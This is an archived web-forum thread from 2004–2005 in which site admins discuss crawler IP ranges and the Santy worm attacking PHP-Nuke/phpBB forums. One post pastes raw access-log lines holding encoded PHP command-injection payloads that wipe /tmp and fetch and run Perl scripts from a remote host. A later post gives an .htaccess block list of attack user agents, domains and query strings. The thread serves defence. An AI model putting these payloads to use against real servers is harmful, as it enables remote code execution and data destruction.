| Topic Archived |
View previous topic :: View next topic |
| Author |
Message |
Phoenix
• Many Posts •
 Offline
Joined: Apr 19, 2004
Posts: 8799
Location: Netizen
|
 Posted: Sun Sep 19, 2004 11:42 pm
Post subject: Re: Hacker IP |
|
NetRange: 66.249.64.0 - 66.249.79.255
CIDR: 66.249.64.0/20
NetName: GOOGLE
NetHandle: NET-66-249-64-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.GOOGLE.COM
NameServer: NS2.GOOGLE.COM
_________________
• DonationsPro for DragonflyCMS, SMF, MyBB, vBulletin •
Phoenix's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
|
|
| Back to top |
|
 |
Charles
Supporter
Offline
Joined: Sep 19, 2004
Posts: 11
|
Posted: Mon Sep 20, 2004 4:20 am
Post subject: Re: Hacker IP's |
|
This is a PHP-Nuke Module that I had found back in June. It is called Google-Counter. Unzip the file and look at /sql/googlecounter.sql and it has a list of IP Addresses for Google. It looks like it was as of May 08, 2004. I don't know if this is all of Googles IP Addresses or not. Hope this helps out.
Charles's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux/1.3.33/4.0.22-standard/4.3.10/8.2c
|
|
| Back to top |
|
|
Charles
Supporter
Offline
Joined: Sep 19, 2004
Posts: 11
|
Posted: Mon Sep 20, 2004 9:01 pm
Post subject: Re: Hacker IP |
|
Here is a link about some more current info about Google and their crawlers.
CLICK HERE
Charles's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux/1.3.33/4.0.22-standard/4.3.10/8.2c
|
|
| Back to top |
|
|
Jeruvy
Security Team
Offline
Joined: Apr 23, 2004
Posts: 1432
Location: Canada
|
Posted: Wed Sep 22, 2004 6:37 pm
Post subject: Re: Hacker IP |
|
Hehe, well I had to laugh today. I saw the march of bots in 66.249.64.0/20 range today.
Thankfully it is a fairly small block.
No record of this block (google crawls) since July 2003 when I started keeping records. Truly bizarre.
First visit: Sept 21 15:00 GMT
_________________
J.
j e r u v y a t y a h o o d o t c o m
Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net
Jeruvy's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}
|
|
| Back to top |
|
|
Victor
Nice poster
Offline
Joined: Dec 06, 2004
Posts: 69
Location: Mexico/Italia
|
Posted: Tue Jan 11, 2005 3:08 pm
Post subject: Re: Hacker IP's |
|
how can you see that. Where i must look for that and if i don't have that how i can make that everything will be saved in log file.
Victor's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
win/linux/2.0.52/4.0.22/4/dragonfly
|
|
| Back to top |
|
|
norbie
Silver Supporter
Offline
Joined: Jun 29, 2004
Posts: 737
Location: Norbie's World
|
Posted: Thu Jan 13, 2005 7:43 pm
Post subject: Re: Hacker IP's |
|
here's a lovely long list of ip addresses and hack attempts on my site using the old santy worm and the viewtopic highlight vulnerability, for viewing pleasure...
| Code:: |
65.254.35.90 - - [31/Dec/2004:11:03:33 +0000] "GET /index.php?name=Forums&file=viewtopic&p=511&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 59474 "-" "Mozilla/4.0"
69.50.214.130 - - [31/Dec/2004:11:05:02 +0000] "GET /index.php?name=Forums&file=viewtopic&p=995&highlight=&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 41243 "-" "Mozilla/4.0"
80.82.139.3 - - [01/Jan/2005:01:38:23 +0000] "GET /index.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;wget%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl%20sess_0bc3910d07edb36750a9babbd179edb4;wget%20http://filepack.superbr.org/wow.f;perl%20wow.f;wget%20http://filepack.superbr.org/wow.x;perl%20wow.x%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 47773 "-" "LWP::Simple/5.64"
67.18.187.106 - - [01/Jan/2005:01:38:49 +0000] "GET /index.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;fetch%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;fetch%20sess_0bc3910d07edb36750a9babbd179edb4;fetch%20http://filepack.superbr.org/wow.f;perl%20wow.f;fetch%20http://filepack.superbr.org/wow.x;perl%20wow.x%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 48084 "-" "LWP::Simple/5.803"
|
EDIT: I had 163 hacking attempts here, so I shortened it down to 4 as it's a bit easier on the eyes!
I've also got a good way to block santy attacks through the .htaccess file if anyone's interested...
it's filtered all of mine since 
_________________
Norbie
www.norbiesworld.co.uk
norbie's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux / Apache Custom Version / 4.0.26-standard (client: 5.0.15) / 4.4.4 / 9.1.1
|
|
| Back to top |
|
|
senzacionale
500+ Posts Club
Offline
Joined: Sep 26, 2004
Posts: 582
Location: Slovenija
|
Posted: Sat Jan 15, 2005 4:03 pm
Post subject: Re: Hacker IP's |
|
yes i am interested!
tell me what did you do.
_________________
Juventus the champion!
senzacionale's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Windows XP/2.0.53/4.1.16/5.1.1/Dragonfly....Gentoo Linux/2.0.52-r1/4.1.16/5.1.1/Dragonfly
|
|
| Back to top |
|
|
norbie
Silver Supporter
Offline
Joined: Jun 29, 2004
Posts: 737
Location: Norbie's World
|
Posted: Sun Jan 16, 2005 12:13 pm
Post subject: Re: Hacker IP's |
|
you'll need to enable your ftp program to 'view hidden files' then download the .htaccess file from your root folder where cpgnuke is installed.
open .htaccess in notepad, then add these lines to the end:
| Code:: |
#TEMP BANS FOR SANTY WORM:
RewriteEngine on
#CHECK FOR KNOWN USED USER_AGENTS:
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]
#CHECK FOR KNOWN ORIGINATORS IN URL:
RewriteCond %{REQUEST_URI} visualcoders [NC,OR]
RewriteCond %{REQUEST_URI} midomain\.false\.ca [NC,OR]
RewriteCond %{REQUEST_URI} envidiosos\.org [NC,OR]
RewriteCond %{REQUEST_URI} filepack\.superbr\.org [NC,OR]
#CHECK FOR COMMON STRINGS IN QUERY :
RewriteCond %{QUERY_STRING} highlight=\%2527 [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
#IF MATCHED, SEND VISITOR TO THEIR OWN LOOPBACK ADDRESS:
RewriteRule ^.*$ http://127.0.0.1 [L] |
then upload it to your site again
_________________
Norbie
www.norbiesworld.co.uk
norbie's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux / Apache Custom Version / 4.0.26-standard (client: 5.0.15) / 4.4.4 / 9.1.1
|
|
| Back to top |
|
|
senzacionale
500+ Posts Club
Offline
Joined: Sep 26, 2004
Posts: 582
Location: Slovenija
|
Posted: Sun Jan 16, 2005 3:06 pm
Post subject: Re: Hacker IP's |
|
hmm
| Code:: |
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster @ mitjab.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Apache/2.0.52 (Win32) PHP/4.3.9 Server at localhost Port 80
|
| Code:: |
[Sun Jan 16 16:05:13 2005] [alert] [client 127.0.0.1] C:/httpserver/wwwroot/portal/.htaccess: Invalid command 'RewriteEngine', perhaps mis-spelled or defined by a module not included in the server configuration
|
i get this error, in apache i have no options of RewriteEngin. In linux works fine?
Strange
_________________
Juventus the champion!
senzacionale's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Windows XP/2.0.53/4.1.16/5.1.1/Dragonfly....Gentoo Linux/2.0.52-r1/4.1.16/5.1.1/Dragonfly
|
|
| Back to top |
|
|
norbie
Silver Supporter
Offline
Joined: Jun 29, 2004
Posts: 737
Location: Norbie's World
|
Posted: Sun Jan 16, 2005 7:56 pm
Post subject: Re: Hacker IP |
|
i would remove those lines from your .htaccess file then.
your server does not support (or have) the mod_rewrite module for apache
_________________
Norbie
www.norbiesworld.co.uk
norbie's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux / Apache Custom Version / 4.0.26-standard (client: 5.0.15) / 4.4.4 / 9.1.1
|
|
| Back to top |
|
|
|
|
Forum FAQ
Log in to check your private messages
Login
Search
